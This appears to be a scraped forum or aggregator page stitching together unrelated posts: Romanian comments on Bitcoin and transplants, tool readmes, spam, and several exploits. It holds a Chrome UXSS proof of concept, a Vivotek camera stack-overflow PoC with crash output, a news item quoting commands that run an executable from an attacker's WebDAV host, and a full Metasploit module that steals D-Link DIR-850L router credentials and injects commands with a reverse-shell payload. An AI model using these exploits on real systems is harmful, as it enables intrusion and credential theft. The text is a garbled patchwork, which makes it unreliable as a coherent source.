blockchain!

Lasa prostiile ca nu e de tine. Va jucati cu lucruri pe care nu le intelegeti. Ca idee: Bitcoin ofera 0(zero) anonimitate. Toate tranzactiile BTC sunt publice. Deci ca idee daca vrei sa utilizezi BTC pentru orice fel de achizitie reala poti fi gasit (relativ usor). Daca vrei anonimitate zkSNARKS in Monero sau scheme de spalat bani Multi-level. (Banuiesc ca te depasesc tare). PS: Ca iti cere buletinul sau nu BTC e tot public si walletul tau va fi foarte usor legat de persoana ta fizica. Complete: Bitcoin's blockchain technology assures imutability, descentralization, distribution of all the transactions. It DOES NOT assure: anonimity, privacy, security (of private keys), protection against corelation attacks.

Am discutat chestia asta la facultate(sunt in domeniu) si pot aparea multe complicatii. Chirurgul cu care am discutat a zis ca este posibil, insa rata de succes este mica. Fiecare om are anumite "mutatii" ca sa le zic asa la nivel de ADN. Se presupune ca administrand imunosupresoare pentru a nu respinge transplantul, este posibil sa traiasca pana la 10-15 ani, dar asta este valabil in transplantul hepatic, de cord, etc. Aici vorbim de nervi, neuroni, celule gliale, care au o structura mult mai fragila fata de cele de mai sus. Pot aparea foarte usor boli de structura a sistemului nervos. Este posibil, dar putin probabil sa fie un succes, mai ales pe termen lung.

Google Chrome versions prior to 62 universal cross site scripting proof of concept exploit. Download CVE-2017-5124-master.zip Content: PoC.mht PoC.php README.md Mirror: README.md # CVE-2017-5124 ### UXSS with MHTML DEMO: https://bo0om.ru/chrome_poc/PoC.php (tested on Chrome/61.0.3163.100) PoC.php <?php $filename=realpath("PoC.mht"); header( "Content-type: multipart/related"); readfile($filename); ?> PoC.mht MIME-Version: 1.0 Content-Type: multipart/related; type="text/html"; boundary="----MultipartBoundary--" CVE-2017-5124 ------MultipartBoundary-- Content-Type: application/xml; <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE catalog [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <xsl:stylesheet id="stylesheet" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="*"> <html><iframe style="display:none" src="https://google.com"></iframe></html> </xsl:template> </xsl:stylesheet> ------MultipartBoundary-- Content-Type: text/html Content-Location: https://google.com <script>alert('Location origin: '+location.origin)</script> ------MultipartBoundary---- Source

Awesome Coding Videos Learn to code by watching free awesome video courses Source: www.awesomecodingvideos.com

Many Vivotek IP cameras suffer from a remote stack overflow vulnerability. Device models include CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, and VC8101. [STX] Subject: Vivotek IP Cameras - Remote Stack Overflow Researcher: bashis <mcw noemail eu> (September-October 2017) PoC: https://github.com/mcw0/PoC Release date: November 13, 2017 Full Disclosure: 43 days Attack Vector: Remote Authentication: Anonymous (no credentials needed) Firmware Vulnerable: Only 2017 versions affected Firmware Patched: October 2017 and higher Device Model: CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, VC8101... and possible more Download Updated Firmware: http://www.vivotek.com/firmware/ [Timeline] October 1, 2017: Reported findings with all details to Vivotek Cybersecurity October 2, 2017: First response from Vivotek October 5, 2017: ACK of findings from Vivotek October 11, 2017: Vivotek reported first fixed Firmware October 12, 2017: After request, Vivotek provided samples of fixed Firmware October 17, 2017: Verified fixed Firmware, Vivotek thanking for the help October 30, 2017: Noticed new Firmware released, pinged to get some info about their advisory November 1, 2017: Agreed on publication November 13, 2017 November 9, 2017: Checked few release notes, none mention security fix; pinged Vivotek with the question why not. November 13, 2017: No reply from Vivotek, Full Disclosure as planned. [Details] Vivotek using modified version of Boa/0.94.14rc21, and the vulnerability has been introduced by Vivotek. The stack overflow is triggered by "PUT" or "POST" request: [PUT|POST] /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n However, the absolutely minimal request to trigger the stack overflow is weird, most probably due to quick hack: "[PUT|POST]Content-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" This allows us to insert [JUNK] with 'Good bytes' up to 9182 bytes (0x1FFF) of the request: "[PUT|POST][JUNK]Content-Length[JUNK]:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" Notes: 1. B to I = $R4-$R11; X = $PC 2. Size of request availible in $R3 at the LDMFD 3. Max request size: 9182 bytes (0x1FFF) 4. "Start with "\n" in "\n\r\n\r\n" needed to jump with 0x00xxxxxx (if not $PC will be 0x0dxxxxxx) 5. Space (0x20) after ':' in 'Content-Length:' counting as one char of the 20 bytes 6. Stack not protected with "Stack canaries" 7. Good bytes: 0x01-0x09, 0x0b-0xff; Bad bytes: 0x00, 0x0a; 8. heap: Non-executable + Non-ASLR 9. stack: Non-executable + ASLR [PoC] $ echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80 (gdb) target remote 192.168.57.20:23946 Remote debugging using 192.168.57.20:23946 0x76eb2c5c in ?? () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? () (gdb) bt #0 0x58585858 in ?? () #1 0x000188f4 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) i reg r0 0x1 1 r1 0x47210 291344 r2 0x0 0 r3 0x75 117 r4 0x42424242 1111638594 r5 0x43434343 1128481603 r6 0x44444444 1145324612 r7 0x45454545 1162167621 r8 0x46464646 1179010630 r9 0x47474747 1195853639 r10 0x48484848 1212696648 r11 0x49494949 1229539657 r12 0x1 1 sp 0x7e92dac0 0x7e92dac0 lr 0x188f4 100596 pc 0x58585858 0x58585858 cpsr 0x60000010 1610612752 (gdb) $ echo -en "PUTContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80 (gdb) target remote 192.168.57.20:23946 Remote debugging using 192.168.57.20:23946 0x76e82c5c in ?? () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? () (gdb) bt #0 0x58585858 in ?? () #1 0x000188f4 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) i reg r0 0x1 1 r1 0x47210 291344 r2 0x0 0 r3 0x4f 79 r4 0x42424242 1111638594 r5 0x43434343 1128481603 r6 0x44444444 1145324612 r7 0x45454545 1162167621 r8 0x46464646 1179010630 r9 0x47474747 1195853639 r10 0x48484848 1212696648 r11 0x49494949 1229539657 r12 0x1 1 sp 0x7ec9cac0 0x7ec9cac0 lr 0x188f4 100596 pc 0x58585858 0x58585858 cpsr 0x60000010 1610612752 (gdb) Have a nice day /bashis [ETX] Source

daca asta e black friday. eu sunt popa. rusine. ce preturi au ptr o tara ca Romania. multumim ptr postare

weather Weather via the command line. Uses the darksky.net API so it's super accurate. Also includes any current weather alerts in the output. Installation Binaries darwin 386 / amd64 freebsd 386 / amd64 linux 386 / amd64 / arm / arm64 solaris amd64 windows 386 / amd64 Via Go $ go get github.com/jessfraz/weather Usage --location, -l: Your address, can be in the format of just a zipcode or a city, state, or the full address. defaults to auto locating you based off your ip --units, -u: The unit system to use. defaults to auto, other options are us, si, uk, uk2, ca for more information on units see the darksky.net api --days, -d: Days of weather to retrieve. defaults to the current weather, ie. 0 or 1 --ignore-alerts: Don't print alerts in weather output. defaults false --hide-icon: Hide the weather icons from being output. defaults false --server, -s: Weather API server uri defaults to "https://geocode.jessfraz.com" Examples # get the current weather in your current location $ weather # change the units to metric $ weather -l "Paris, France" -u si # it will auto guess the units though so changing # the location to paris will change the units to `si` $ weather -l "Paris, France" # get three days forecast for NY $ weather -l 10028 -d 3 # or you can autolocate and get three days forecast $ weather -d 3 # get the weather in Manhattan Beach, CA # even includes alerts $ weather -l "Manhattan Beach, CA" # .;odc # ;kXNNNO # .0NNO0NN: # 'XNK; dNNl # KNX' 'XNK. # ,NNk cXNK, # ,NNk '0NNO:. # .'cXNXl;,. ,xXNNKOxxxk0Xx # 'lOXNNNNNNNNNNXOo' ':oxkOXNNXc # cKNNKd:'. ..;d0NNKl ,xXNK, # .;:cclKNXd. .oXNXxOXNNXl # .cOXNNNNNNNO. .kNNNNNNNXOc. # lXNXx;. . . .;dXNXo # ONNd. oXN0. # dNNo cNNk # XNN. NNX # 0NN' .NNK # ;XN0. .ONNc # ;XNXo. .lXNX: # .oXNX0dlcclx0Xo. .oXKxlccldOXNXd. # ,lk0KXXK0xKNN0o;.. ..;o0NNKx0KXXX0ko, # 'lOXNNNNNNNNNNXOo, # :x0XNNX0x:. # # # Current weather is Partly Cloudy in Manhattan Beach in California for July 14 at 4:14am EDT # The temperature is 69.2°F, but it feels like 69.2°F # # Special Weather Statement for Los Angeles, CA # ...THREAT OF MONSOONAL THUNDERSTORMS LATE TONIGHT THROUGH WEDNESDAY... # A STRONG UPPER LEVEL HIGH PRESSURE SYSTEM CURRENTLY CENTERED OVER NEVADA # WILL BRING INCREASING EAST TO SOUTHEAST FLOW OVER SOUTHERN # CALIFORNIA. AS A RESULT...A SIGNIFICANT SURGE OF MONSOONAL MOISTURE # WILL MOVE INTO SOUTHWEST CALIFORNIA LATE TONIGHT THROUGH WEDNESDAY. # THE GREATEST THREAT OF SHOWERS AND THUNDERSTORMS WILL BE ACROSS THE # MOUNTAINS AND ANTELOPE VALLEY LATE TONIGHT INTO TUESDAY. DUE TO THE # EASTERLY UPPER LEVEL FLOW ON MONDAY...THERE WILL ALSO BE A SLIGHT # CHANCE OF SHOWERS AND THUNDERSTORMS ACROSS MOST COASTAL AND VALLEY # AREAS. # THE DEEPER MONSOONAL MOISTURE WILL BRING THE POTENTIAL FOR BRIEF HEAVY # RAINFALL WITH STORMS THAT DEVELOP ON MONDAY AND TUESDAY...ESPECIALLY # ACROSS THE MOUNTAINS AND ANTELOPE VALLEY. WHILE STORMS ARE EXPECTED # TO BE FAST MOVING...THERE WILL BE THE POTENTIAL FOR LOCALIZED FLOODING # OF ROADWAYS AND ARROYOS. ON TUESDAY...THE THREAT OF THUNDERSTORMS IS # EXPECTED TO REMAIN CONFINED TO THE MOUNTAINS AND DESERTS. WITH WEAKER # UPPER LEVEL WINDS ON TUESDAY...STORMS WILL LIKELY MOVE SLOWER. AS A # RESULT...THERE WILL BE AN INCREASED THREAT OF FLASH FLOODING. # IT WILL NOT BE AS HOT ACROSS MUCH OF THE REGION TOMORROW DUE TO THE # INCREASED MOISTURE AND CLOUD COVERAGE...WITH INTERIOR SECTIONS # GENERALLY REMAINING IN THE 90S. HOWEVER...THERE WILL BE A # SIGNIFICANT INCREASE IN HUMIDITY ON MONDAY THAT WILL CONTINUE TO # BRING DISCOMFORT. # ANYONE PLANNING OUTDOOR ACTIVITIES IN THE MOUNTAINS AND DESERTS # DURING THE NEXT FEW DAYS SHOULD CAREFULLY MONITOR THE LATEST # NATIONAL WEATHER SERVICE FORECASTS AND STATEMENTS DUE TO THE # POTENTIAL HAZARDS ASSOCIATED WITH THUNDERSTORMS. # Created: July 13 at 10:50pm EDT # Expires: July 14 at 7:00pm EDT # # Ick! The humidity is 85% # The nearest storm is 18 miles NE away # The wind speed is 3.96 mph SE # The cloud coverage is 35% # The visibility is 9.58 miles # The pressure is 1012.99 mbar Makefile Usage $ make help all Runs a clean, build, fmt, lint, test, vet and install build Builds a dynamic executable or package clean Cleanup any build binaries or packages cross Builds the cross compiled binaries, creating a clean directory structure (eg. GOOS/GOARCH/binary) fmt Verifies all files have men `gofmt`ed install Installs the executable or package lint Verifies `golint` passes release Builds the cross compiled binaries, naming them in such a way for release (eg. binary-GOOS-GOARCH) tag Create a new git tag to prepare to build a release test Runs the go tests vet Verifies `go vet` passes Download weather-master.zip Source

Step aside python \o/. Meanwhile, curl wttr.in/Tokyo

Scan .onion hidden services with nmap using Tor, proxychains and dnsmasq in a minimal alpine Docker container. docker-onion-nmap Use nmap to scan hidden "onion" services on the Tor network. Minimal image based on alpine, using proxychains to wrap nmap. Tor and dnsmasq are run as daemons via s6, and proxychains wraps nmap to use the Tor SOCKS proxy on port 9050. Tor is also configured via DNSPort to anonymously resolve DNS requests to port 9053. dnsmasq is configured to with this localhost:9053 as an authority DNS server. Proxychains is configured to proxy DNS through the local resolver, so all DNS requests will go through Tor and applications can resolve .onion addresses. Example: $ docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion [tor_wait] Wait for Tor to boot... (might take a while) [tor_wait] Done. Tor booted. [nmap onion] nmap -p 80,443 facebookcorewwwi.onion [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.12 Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:17 UTC [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK Nmap scan report for facebookcorewwwi.onion (224.0.0.1) Host is up (2.7s latency). PORT STATE SERVICE 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 3.58 seconds How it works: When the container boots, it launches Tor and dnsmasq as daemons. The tor_wait script then waits for the Tor SOCKS proxy to be up before executing your command. Arguments: By default, args to docker run are passed to /bin/nmap which calls nmap with args -sT -PN -n "$@" necessary for it to work over Tor (via explainshell.com). For example, this: docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/nmap -sT -PN -n -p 80,443 facebookcorewwwi.onion In addition to the custom script for nmap, custom wrapper scripts for curl and nc exist to wrap them in proxychains, at /bin/curl and /bin/nc. To call them, simply specify curl or nc as the first argument to docker run. For example: docker run --rm -it milesrichardson/onion-nmap nc -z 80 facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/nc -z 80 facebookcorewwwi.onion and docker run --rm -it milesrichardson/onion-nmap curl -I https://facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/curl -I https://facebookcorewwwi.onion If you want to call any other command, including the original /usr/bin/nmap or /usr/bin/nc or /usr/bin/curl you can specify it as the first argument to docker run, e.g.: docker run --rm -it milesrichardson/onion-nmap /usr/bin/curl -x socks4h://localhost:9050 https://facebookcorewwwi.onion Environment variables: There is only one environment variable: DEBUG_LEVEL. If you set it to anything other than 0, more debugging info will be printed (specifically, the attempted to connections to Tor while waiting for it to boot). Example: $ docker run -e DEBUG_LEVEL=1 --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion [tor_wait] Wait for Tor to boot... (might take a while) [tor_wait retry 0] Check socket is open on localhost:9050... [tor_wait retry 0] Socket OPEN on localhost:9050 [tor_wait retry 0] Check SOCKS proxy is up on localhost:9050 (timeout 2 )... [tor_wait retry 0] SOCKS proxy DOWN on localhost:9050, try again... [tor_wait retry 1] Check socket is open on localhost:9050... [tor_wait retry 1] Socket OPEN on localhost:9050 [tor_wait retry 1] Check SOCKS proxy is up on localhost:9050 (timeout 4 )... [tor_wait retry 1] SOCKS proxy DOWN on localhost:9050, try again... [tor_wait retry 2] Check socket is open on localhost:9050... [tor_wait retry 2] Socket OPEN on localhost:9050 [tor_wait retry 2] Check SOCKS proxy is up on localhost:9050 (timeout 6 )... [tor_wait retry 2] SOCKS proxy UP on localhost:9050 [tor_wait] Done. Tor booted. [nmap onion] nmap -p 80,443 facebookcorewwwi.onion [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.12 Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:34 UTC [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK Nmap scan report for facebookcorewwwi.onion (224.0.0.1) Host is up (2.8s latency). PORT STATE SERVICE 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds Notes: No UDP available over Tor Tor can take 10-20 seconds to boot. If this is untenable, another option is to run the proxy in its own container, or run it as the main process and then run "exec" to call commands like nmap gr33tz @jessfraz tor-proxy @zuazo alpine-tor-docker shellhacks crypto-rebels.de Download: docker-onion-nmap-master.zip or git clone https://github.com/milesrichardson/docker-onion-nmap.git Source

What is MHA: Mail header analyzer is a tool written in flask for parsing email headers and converting them to a human readable format and it also can: Identify hop delays. Identify the source of the email. Identify hop country. MHA is an alternative for the following: Name Dev Issues MessageHeader Google Not showing all the hops. EmailHeaders Mxtoolbox Not accurate and slow. Message Header Analyzer Microsoft Broken UI. Installation: Install system dependencies: sudo apt-get update sudo apt-get install python-pip sudo pip install virtualenv Create a Python virtual environment and activate it: virtualenv virt source virt/bin/activate Clone the GitHub repo: git clone https://github.com/lnxg33k/MHA.git Install Python dependencies: cd MHA pip install -r requirements.txt Run the development server: python server.py -d You can change the bind address or port by specifying the appropriate options: python server.py -b 0.0.0.0 -p 8080 Everything should go well, now visit: http://localhos:8080 Docker A Dockerfile is provided if you wish to build a docker image. docker build -t mha:latest . You can then run a container with: docker run -d -p 8080:8080 mha:latest Download MHA-master.zip Source: https://github.com/lnxg33k/MHA

You should be extra careful when opening files in MS Office. When the world is still dealing with the threat of 'unpatched' Microsoft Office's built-in DDE feature, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers. The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update. Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document. The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents. However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user. Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions. DEMO: Exploitation Allows Full System Take Over Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software. This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847). Possible Attack Scenario: While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below: "By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)." "One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker." "Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient." "After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service." Protection Against Microsoft Office Vulnerability With this month's Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory. So, users are strongly recommended to apply November security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers. Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security. Users can run the following command in the command prompt to disable registering of the component in Windows registry: reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 For 32-bit Microsoft Office package in x64 OS, run the following command: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 Besides this, users should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro). Via thehackernews.com

This Metasploit module leverages an unauthenticated credential disclosure vulnerability to execute arbitrary commands on DIR-850L routers as an authenticated user. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'openssl' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'DIR-850L (Un)authenticated OS Command Exec', 'Description' => %q{ This module leverages an unauthenticated credential disclosure vulnerability to then execute arbitrary commands on DIR-850L routers as an authenticated user. Unable to use Meterpreter payloads. }, 'Author' => [ 'Mumbai', # https://github.com/realoriginal (module) 'Zdenda' # vuln discovery ], 'References' => [ ['URL', 'https://www.seebug.org/vuldb/ssvid-96333'], ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'], ], 'DisclosureDate' => 'Aug 9 2017', 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp' }, 'Privileged' => true, 'Payload' => { 'DisableNops' => true, }, 'Targets' => [[ 'Automatic', {} ]], )) end def check begin res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if res && res.headers['Server'] auth = res.headers['Server'] if auth =~ /DIR-850L/ if auth =~ /WEBACCESS\/1\.0/ return Exploit::CheckCode::Safe else return Exploit::CheckCode::Detected end end end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def report_cred(opts) service_data = { address: opts[:ip], port: opts[:port], service_name: opts[:service_name], protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :password }.merge(service_data) login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED, proof: opts[:proof] }.merge(service_data) create_credential_login(login_data) end # some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well... # should write an auxiliary module to-do -> WRITE AUXILIARY def retrieve_creds begin xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" xml << "<postxml>\r\n" xml << "<module>\r\n" xml << " <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n" xml << "</module>\r\n" xml << "</postxml>" res = send_request_cgi({ 'uri' => '/hedwig.cgi', 'method' => 'POST', 'encode_params' => false, 'headers' => { 'Accept-Encoding' => 'gzip, deflate', 'Accept' => '*/*' }, 'ctype' => 'text/xml', 'cookie' => "uid=#{Rex::Text.rand_text_alpha_lower(8)}", 'data' => xml, }) if res.body =~ /<password>(.*)<\/password>/ # fixes stack trace issue parse = res.get_xml_document username = parse.at('//name').text password = parse.at('//password').text vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}") loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body) print_good("#{peer} - Downloaded credentials to #{loot}") return username, password else fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained") end rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def retrieve_uid begin res = send_request_cgi({ 'uri' => '/authentication.cgi', 'method' => 'GET', }) parse = res.get_json_document uid = parse['uid'] challenge = parse['challenge'] return uid, challenge rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def login(username, password) uid, challenge = retrieve_uid begin hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase send_request_cgi({ 'uri' => '/authentication.cgi', 'method' => 'POST', 'data' => "id=#{username}&password=#{hash}", 'cookie' => "uid=#{uid}" }) return uid rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def execute_command(cmd, opts) uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" payload << "<postxml>\r\n" payload << "<module>\r\n" payload << " <service>DEVICE.TIME</service>\r\n" payload << " <device>\r\n" payload << " <time>\r\n" payload << " <ntp>\r\n" payload << " <enable>1</enable>\r\n" payload << " <period>604800</period>\r\n" payload << " <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}&); </server>\r\n" payload << " </ntp>\r\n" payload << " <ntp6>\r\n" payload << " <enable>1</enable>\r\n" payload << " <period>604800</period>\r\n" payload << " </ntp6>\r\n" payload << " <timezone>20</timezone>\r\n" payload << " <time/>\r\n" payload << " <date/>\r\n" payload << " <dst>0</dst>\r\n" payload << " <dstmanual/>\r\n" payload << " <dstoffset/>\r\n" payload << " </time>\r\n" payload << " </device>\r\n" payload << "</module>\r\n" payload << "</postxml>" begin # save configuration res = send_request_cgi({ 'uri' => '/hedwig.cgi', 'method' => 'POST', 'ctype' => 'text/xml', 'data' => payload, 'cookie' => "uid=#{uid}" }) # execute configuration res = send_request_cgi({ 'uri' => '/pigwidgeon.cgi', 'method' => 'POST', 'data' => 'ACTIONS=SETCFG,ACTIVATE', 'cookie' => "uid=#{uid}" }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def exploit print_status("#{peer} - Connecting to target...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url") end # # Information Retrieval, obtains creds and logs in # @username, @password = retrieve_creds execute_cmdstager( :flavor => :wget, :linemax => 200 ) end end Download dlink_dir850l_unauth_exec.rb.txt Source

Parerea mea, decat sa iti pierzi timpul si energia facand niste maruntis la varsta asta, cand totusi nu esti pe cont propriu(cred), mai bine ti-ai folosi timpul ca sa inveti cat mai multe lucruri, si mai tarziu o sa ai banii asigurati. La varsta ta, e mai recomandat sa iti dezvolti mintea, in caz contrar, risti sa ajungi sa lucrezi pe bani de cafele toata viata, poate chiar pentru cei care au pus accent pe invatat in loc de facut bani de mici.

thanks, that was helpful any way this is mobotak.com and its a company whom interested in tech and electronic gadgets.our company buy,sell and repair cell phones,tablets and computers ans so sell their accessories,if you have any questions about this kind of staff we will glad to help.

Fereasca Dumnezeu, pe tine chiar nu te duce capul. Atat poti man! Maxed your level!